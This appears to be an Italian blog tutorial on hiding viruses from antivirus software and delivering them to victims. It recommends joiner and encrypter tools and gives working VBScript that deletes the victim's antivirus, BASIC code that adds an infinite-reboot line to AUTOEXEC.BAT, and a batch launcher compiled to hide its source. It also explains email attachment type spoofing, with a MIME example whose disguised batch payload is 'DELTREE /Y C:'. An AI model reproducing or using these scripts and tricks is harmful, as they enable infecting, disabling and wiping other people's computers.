I TOOLS NECESSARI
Vi servono:
- un computer
- un virus
- Blade Joiner (o un qualsiasi Joiner x WinZozz)
- Bat2Com
- ExOM
Trovate tutto qui sotto (tranne il computer :-)).
FUNZIONAMENTO DI UN ANTIVIRUS
Le tecniche utilizzate dai prodotti antivirus sono due: la ricerca euristica e il riconoscimento della firma digitale.
* Ricerca euristica
L'antivirus analizza il file (programma o documento) cercando porzioni di codice in grado di svolgere azioni insolite. Funzione tipica delle applicazioni più costose, destinate in particolare a sistemi di protezione aziendale e per grandi banche dati, è una tecnica molto complessa perché implica, da parte di chi la sviluppa, la conoscenza perfetta dei programmi e dei sistemi operativi. In pratica, si tratta di capire come può essere infettato un sistema e di conoscere i punti deboli dei programmi che possono esservi installati. A questo punto il programmatore dovrà sviluppare un software in grado di anticipare l'attività sospetta diretta ai punti deboli identificati. Il grande pregio di questa tecnica consiste nel fatto che l'antivirus è un passo in avanti rispetto ai possibili virus, è già pronto cioè prima che questi vengano creati. Il suo difetto nel numero di falsi allarmi, anche molto elevato in funzione della sensibilità e della completezza del prodotto. La maggior parte degli antivirus in commercio include anche un motore di ricerca euristica, la cui efficacia è tuttavia strettamente correlata al prezzo del prodotto: un antivirus per uso personale non offre, in genere, un sistema di rilevazione euristica particolarmente efficace.
* Riconoscimento della firma digitale
L'antivirus mette a confronto il codice dei file da controllare con quello dei virus conosciuti. Le informazioni su questi ultimi sono raccolte in un database che deve essere aggiornato a intervalli regolari e brevissimi (anche una volta al giorno). È la tecnica utilizzata dalla maggior parte dei prodotti per uso personale (in effetti, da tutti i prodotti, con un'unica eccezione). Il suo pregio è che consente di mantenere contenuto il prezzo dell'antivirus, il suo difetto è che si trova sempre un passo indietro rispetto ai virus. Perché sia efficace occorre infatti che il virus sia stato trovato e che la sua descrizione sia stata inserita nel database: solo così potrà essere riconosciuto e neutralizzato dal software. Per i programmi più diffusi, i rispettivi produttori mettono a disposizione aggiornamenti frequenti del database, anche quotidiani: è quindi necessario collegarsi al sito ed effettuare l'aggiornamento online delle informazioni, procedura che in genere non richiede più di qualche minuto.
TECNICA 1: IL JOINER
Una famosa tecnica x nascondere i virus sono i joiner. Il loro funzionamento è molto semplice: creano un file .EXE che è l'unione di due files. Uno di questi 2 files deve essere per forza un file .EXE. L'antivirus non capta il virus mescolato con un altro file perchè non risconosce la firma digitale... L'unico difetto di questa tecnica è che i files ottenuti dalla fusione sono files molto grandi, e quindi potrebbero destare sospetto. Il migliore joiner in circolazione su internet è il Blade Joiner. Questo infatti dispone di diverse funzionalità (esempio: ha la notificazione ad ICQ); uno tra i migliori è anche il Senna Spy Exe Maker. Questi due files sono scaricabili dalla SEZIONE UTILIY del sito. I files mescolati nn devono essere per forza files .EXE ma possono anche essere di diversa estensione (jpeg,bitmap...).
TECNICA 2: ELIMINAZIONE
Una tecnica molto laboriosa per eliminare il controllo dell'antivirus è eliminare l'antivirus!!! Semplicemente basta creare un file .VBS con il comando di trovare il file principale dell'antivirus e eliminarlo, quindi riavviare il computer ed eseguire il virus.
Come? Così:
TAGLIA QUI
SALVA IL FILE COME CERCA.VBS
'*********************************************
Cerca files antivirus e distruggi
'*********************************************
Dim WSHShell
Set WSHShell = WScript.CreateObject("WScript.Shell")
Dim windir,systemdir
object = "C:" ' Il drive in cui devi effettuare la ricerca
On Error Resume Next
Dim fso, f1, f2, s
Set fso = CreateObject("Scripting.FileSystemObject")
Set f2 = fso.GetFile(object & "danieletempinserisci_il.nome") 'Inserisci il nome del file
f2.Delete
'Nel caso non sappiate quale antivirus sia installato nel computer della vittima vi consiglio di inserire più nomi di files da cercare ed eliminare. Basta compiare per più volte il codice che si trova dopo il "On Error resume next" e prima di questo suggerimento.
Sub Welcome()
Dim intDoIt
intDoIt = MsgBox(L_Welcome_MsgBox_Message_Text, _
vbOKCancel + vbInformation, _
L_Welcome_MsgBox_Title_Text )
If intDoIt = vbCancel Then
WScript.Quit
End If
End Sub
TAGLIA QUI
Rinomina il file CERCA.VBS con CERCA.VBSS
A questo punto c'è il bisogno di aggiungere una stringa nel file AUTOEXEC.BAT che apra il virus dopo il riavvio del pc. In questo caso bastano poche righe di Basic:
Taglia qui...
REM *********************************************
REM *
REM * Aggiugni stringhe a file autoexec.bat
REM *
REM *
REM *
REM *
REM *
REM *********************************************
REM RINOMINA IL FILE COME CON.BAS
10 CLS
20 OPEN ("C:AUTOEXEC.BAT") FOR APPEND AS #1
30 PRINT #1, " " 'Inserisci tra le virgolette il nome del virus. Non dimenticarti del ' percorso se il file non si trova nella directory C:
40 PRINT #1,"c:windowsrundll32.exe user,exitwindows" 'Riavvia il pc all'infinito...
50 CLOSE
60 END
Taglia qui...
Dopo aver scritto il codice sorgente compila il file CON.BAS. Il risultato sarà CON.EXE. Rinomina CON.EXE COME CON.EYE
Ora manca solo un programma Smascheri(al momento giusto) ed esegua gli altri due file. Ho scelto x queste azioni un file .BAT. Il codice sorgente è il seguente:
Taglia qui...
@echo off
echo *********************************************>nul
echo * *>nul
echo * Rinomina i files, eseguili,cancellali e *>nul
echo * *>nul
echo * riavvia il pc. *>nul
echo * *>nul
echo * *>nul
echo * *>nul
echo * *>nul
echo * *>nul
echo *********************************************>nul
@echo>nul
@echo RINOMINA IL FILE SETUP.BAT>NUL
@ren CERCA.VBSS CERCA.VBS
@ren CON.EYE CON.EXE
@cerca.vbs
@con.exe
@c:windowsrundll32.exe user,exitwindows
@exit
Taglia qui...
Anche in questo caso è meglio nascondere il codice sorgente del file SETUP.BAT. Quindi apriamo il programma bat2com e scriviamo:
bat2com SETUP.BAT
Il risultato sarà un file di nome SETUP.COM
Racchiudi tutto in una cartella con il virus. Magari racchiudi il tutto con Winzip e il tuo virus è pronto x essere inviato.
TECNICA 3: ENCRYPTER
Questa è una nuova tecnica che ho sperimentato e ideato personalmente. Consiste nell'encryptare un file in modo che nn possa essere disassemblato e quindi neanche rilevato dal sistema di riconoscimento della firma digitale dell'antivirus. Il vero problema di questa tecnica, è il programma. Questo infatti è difficilmente reperibile soprattuto per i virus che solitamente funzionano sotto dos. Il programma migliore che ho trovato è stato l'ExOm. Per encryptare un file basta digitare...
exom nomefile.estensione
Nessuna di queste tecniche da SOLA garantisce un affidabilità del 100%. Vi consiglio infatti di mescolare tra loro le tecniche descritte. Come??
Esempio:
Per prima cosa encrypto il file; poi lo mescolo con un altro file con il blade joiner. In seguito creo un sistema per eliminare l'anitvirus come quello descritto nel capitolo 5.0. In questo modo avrete più possibilità di successo.
IL FILE TIPE SPOOFING
Lo spoofing dei tipi di file è una tecnica usata, spesso anche dai virus, per simulare che un certo file corrisponda ad un tipo diverso da ciò che è realmente: in questo modo si può ingannare un utente facendogli credere che un certo attachment sembri un'immagine JPG, un archivio ZIP o qualsiasi altra cosa, quando in realtà non lo è. Un primo tipo di inganno, quello delle estensioni, è molto semplice da realizzare e si basa sul fatto che Windows (95/98/ME) gestisce male le estensioni associate ai diversi tipi di files. Infatti il sistema di Microsoft è stato progettato (di default) per non visualizzare le estensioni dei tipi di files che hanno un'associazione nel registro. Ciò vuol dire che un file ARCHIVIO.ZIP viene mostrato all'interno di Esplora Risorse e degli altri programmi solo col nome ARCHIVIO, senza visualizzare la sua estensione e può essere riconosciuto dalla classica icona associata ai file di Winzip. Questa constatazione ci pone un primo interrogativo: cosa succede ad un file rinominato (volutamente) col nome ARCHIVIO.ZIP.EXE? Questo viene considerato un file di Winzip o un eseguibile? Ecco quindi in cosa consiste il primo inganno sui tipi di file: usando questo trucco della "doppia estensione" Windows riconosce il file come un .EXE (quindi lo tratta come un eseguibile) tuttavia visualizza solo il nome senza l'estensione, quindi per un utente ignaro di questo fatto, il file porterà il nome ARCHIVIO.ZIP, quando in realtà è un'applicazione .EXE. Questo trucco è stato usato da molti worm come il famigerato ZIP Explorer. Per accorgersi della frode l'unica cosa che si può fare (oltre ad usare un buon antivirus) è quella di far visualizzare a Windows le estensioni dei files, anche per quelli associati ad applicazioni. Questa opzione si può attivare da Esplora Risorse nel menu Strumenti/Opzioni Cartella o Visualizza/Opzioni Cartella. In questo modo un'e-mail che porta dietro una attachment, visualizza il file allegato col suo nome reale, mostrando magari che questo in realtà è un eseguibile.
IL MIME NELLE E-MAIL
Un secondo modo di realizzare lo spoofing dei tipi di files è invece molto più subdolo e meno facile da intercettare: si tratta dell'uso di intestazioni malformate nel protocollo MIME che gestisce gli allegati alle e-mail. Gli attachment in un messaggio di posta elettronica vengono codificati usando lo standard MIME con una codifica di solo testo nel caso dei file ASCII puri (TXT, BAT, HTA) oppure con la codifica "base64" nel caso si tratti di file binari (eseguibili, immagini, file ZIP). Ecco un esempio di come vengono codificati (in forma di attachment) un file di immagine (PAMELA.GIF) e un file eseguibile (COMMAND.COM). La sezione evidenziata (box 1) nelle due definizioni di attachment è quella che definisce il tipo di files allegato e quindi anche l'applicazione da eseguire e l'associazione che deve realizzare Windows per quel file. L'inganno consiste proprio nel cambiare il campo "Content-Type" indicando magari che un file eseguibile è un'immagine. Windows (quindi Outlook Express) andrà ad associare a quel file l'icona corrispondente a ciò che indichiamo dentro la definizione MIME, quindi un attachment che magari è un programma porterà l'icona associate ai file GIF. Proviamo allora a creare una e-mail con un allegato "camuffato": scriviamo un file di testo come quello riportato e salviamolo poi con l'estensione .EML (per renderlo una e-mail leggibile da Outlook);
MIME-Version: 1.0
From: mittente@server.com
To: destinatario@server.com
Subject: bla bla bla
Content-Type: image/gif; charset=us-ascii
Content-Transfer-Encoding: 7bit
Il file allegato è un'applicazione di tipo HTA, quindi eseguibile, tuttavia se andiamo ad aprire l'e-mail essa riporta un allegato con l'icona di un'immagine GIF proprio perche nel "Content - Type" abbiamo specificato un tipo di file diverso. l'exploit ancora non è ancora completo, perché se ora proviamo ad aprire il file allegato, questo viene associato al visualizzatore di immagini GIF di Windows e non viene più considerato un eseguibile, quindi pur volendo non potrebbe causare alcun danno. Cosa è successo? Cambiando il "Content - Type" abbiamo modificato radicalmente il tipo di file, che ora viene associato ad un'altra applicazione e quindi non è più eseguibile. Come oltrepassare questa limitazione? E' qui che viene sfruttato un bug del MIME che consiste nel creare un "Subject" dell'e-maillungo 255 caratteri (ne uno di più, ne uno di meno!) seguito dall'estensione che vogliamo dare al file (nel caso di prima quindi ".HTA"). Se mettessimo un solo carattere in meno dei 255 previsti, l'allegato verrebbe riconosciuto come un'immagine GIF; se invece mettessimo un carattere in più l'allegato perderebbe ogni tipo di estensione e non sarebbe riconosciuto da Windows ne associato a qualche applicazione. Ecco quindi come modificare l'e-mail per realizzare il filetype spoofing;
From: mittente@server.com
To: destinatario@server.com
Subject: PAMELA.GIF + [245 spazi vuoti] + .HTA
Content-Type: image/gif; charset=us-ascii
Content-Transfer-Encoding: 7bit
L'essenziale è inserire nel " Subject" 255 caratteri ASCll: volendo si può scrivere anche un nome fasullo per il file (PAMELA.GIF) e completare poi i caratteri che mancano con degli spazi vuoti fino ad arrivare a 255 (nel nostro caso quindi servono 245 spazi perché "PAMELA.GIF" è lungo 10 caratteri) e infine scrivere la vera estensione da assegnare al file allegato (.HTA). Il tutto ovviamente va scritto su un'unica riga;
Ecco un altro esempio che utilizza lo spoofing di un file BAT, che virtualmente può eseguire qualsiasi comando sul sistema:
From: mittente@server.com
To: destinatario@server.com
Subject: PAMELA.GIF + [245 spazi vuoti] + .BAT
Content-Type: image/gif; charset=us-ascii
Content-Transfer-Encoding: 7bit
DELTREE /Y C:
Content-Type: image/gif; name="PAMELA.GIF"
Content-Transfer-Encoding: base64
oaMk7W8HR28u0yAIB2OfcimXz5UmiMuV025P83
.......(parte codificata in base64)
Content-Type: application/actet-stream; name="COMMAND.COM"
Content-Transfer-Encoding: base64
TVogALsAAAC4BAAA//8AAAAAAAAAA
.......(parte codificata in base64)
ESEMPIO DI CODIFICA DEGLI ALLEGATI
Come ci difende Windows da questi attachment pericolosi? E' vero che la falla di sicurezza può rendere ingannevoli i files e confondere gli utenti, tuttavia Windows si accorge dell'inghippo e quando l'utente clicca per aprire l'allegato, Outlook mostra un minimo di avviso, anche se però non viene menzionato il fatto che l'allegato non è un'immagine e all'interno dello stesso avviso il file viene nominato col nome fasullo, non con quello reale, proprio per il fatto che sono stati usati 255 caratteri.
Condividi e segnala 
Sesso: M
Inviato da: ped
il 23/08/2009 alle 23:29
Inviato da: isabeaudreams
il 02/06/2009 alle 20:56
Inviato da: sara.princess1987
il 31/05/2009 alle 14:09